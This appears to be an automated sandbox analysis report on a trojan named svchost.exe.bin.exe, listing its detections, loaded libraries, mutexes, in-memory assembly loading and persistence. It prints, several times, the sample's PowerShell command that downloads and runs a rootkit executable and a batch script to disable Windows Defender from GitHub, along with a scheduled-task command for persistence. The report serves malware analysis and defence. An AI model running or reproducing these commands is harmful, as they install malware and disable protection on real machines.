                Source: svchost.exe.bin.exe, Difficult.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: svchost.exe.bin.exe, Difficult.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.evad.winEXE@8/7@4/4
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeFile created: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:932:120:WilError_03
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeMutant created: \Sessions\1\BaseNamedObjects\IuHnz1JVCqpoWOwU
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6884:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ceych4n.iku.ps1Jump to behavior
                Source: svchost.exe.bin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: svchost.exe.bin.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: svchost.exe.bin.exeVirustotal: Detection: 72%
                Source: svchost.exe.bin.exeReversingLabs: Detection: 76%
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeFile read: C:\Users\user\Desktop\svchost.exe.bin.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\svchost.exe.bin.exe "C:\Users\user\Desktop\svchost.exe.bin.exe"
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "svchost.exe.bin" /tr "C:\Users\user\AppData\Roaming\svchost.exe.bin.exe"
                Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe.bin.exe C:\Users\user\AppData\Roaming\svchost.exe.bin.exe
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"Jump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "svchost.exe.bin" /tr "C:\Users\user\AppData\Roaming\svchost.exe.bin.exe"Jump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: svchost.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: svchost.exe.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: ystem.pdb source: powershell.exe, 00000003.00000002.2290955846.000002A7F8AF3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000003.00000002.2290320709.000002A7F8A48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000003.00000002.2291436459.000002A7F8C9B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.2291995920.000002A7F8D1A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \System.pdb source: powershell.exe, 00000003.00000002.2290955846.000002A7F8AF3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000003.00000002.2291436459.000002A7F8C9B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000003.00000002.2290320709.000002A7F8A48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbpu source: powershell.exe, 00000003.00000002.2291995920.000002A7F8D1A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: 56ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2291436459.000002A7F8C9B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: m.pdb source: powershell.exe, 00000003.00000002.2290955846.000002A7F8AF3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb0 source: powershell.exe, 00000003.00000002.2291995920.000002A7F8D1A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: em.Core.pdbt source: powershell.exe, 00000003.00000002.2290955846.000002A7F8AF3000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: svchost.exe.bin.exe, Difficult.cs.Net Code: Community System.AppDomain.Load(byte[])
                Source: svchost.exe.bin.exe, Difficult.cs.Net Code: Southeast System.Reflection.Assembly.Load(byte[])
                Source: svchost.exe.bin.exe.0.dr, Difficult.cs.Net Code: Community System.AppDomain.Load(byte[])
                Source: svchost.exe.bin.exe.0.dr, Difficult.cs.Net Code: Southeast System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"Jump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeCode function: 0_2_00007FFABC4000BD pushad ; iretd 0_2_00007FFABC4000C1
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeCode function: 0_2_00007FFABC4079AD push ebx; ret 0_2_00007FFABC4079C2
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeCode function: 0_2_00007FFABC408163 push ebx; ret 0_2_00007FFABC40816A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFABC3F00BD pushad ; iretd 3_2_00007FFABC3F00C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFABC4C71CA push eax; retf 3_2_00007FFABC4C71CD
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeCode function: 15_2_00007FFABC3F00BD pushad ; iretd 15_2_00007FFABC3F00C1

                Persistence and Installation Behavior

                barindex
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"Jump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeFile created: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "svchost.exe.bin" /tr "C:\Users\user\AppData\Roaming\svchost.exe.bin.exe"
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
